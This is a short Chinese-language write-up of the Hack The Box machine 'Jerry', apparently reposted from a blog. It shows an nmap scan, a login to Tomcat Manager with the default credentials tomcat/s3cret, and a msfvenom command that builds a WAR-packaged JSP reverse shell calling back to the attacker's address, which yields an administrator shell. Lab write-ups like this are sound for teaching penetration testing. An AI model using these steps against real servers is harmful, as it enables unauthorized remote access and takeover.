其他分享
首页 > 其他分享> > Hack The Box::Jerry

Hack The Box::Jerry

作者:互联网

0x00 信息收集

nmap -Pn -sV -p- -T 4 10.10.10.95

PORT STATE SERVICE VERSION
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1

8080端口是tomcat默认的界面,通常尝试账号密码爆破
HTB-Jerry-Screenshot1.png
使用默认口令tomcat/s3cret成功登录manager界面
HTB-Jerry-Screenshot2.png
进入后台后,可以发现上传点
HTB-Jerry-Screenshot3.png

0x01 漏洞利用

利用msfvenom生成jsp格式的shell,并上传war包
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.8 LPORT=4444 -f war > shell.war
HTB-Jerry-Screenshot4.png
可以在后台中看到shell的路径
HTB-Jerry-Screenshot5.png
访问http://10.10.10.95/shell,成功得到shell,而且是管理员权限。
HTB-Jerry-Screenshot6.png

标签:Box,msfvenom,shell,http,Jerry,10.95,Hack,10.10,war
来源: https://www.cnblogs.com/aya82/p/14193642.html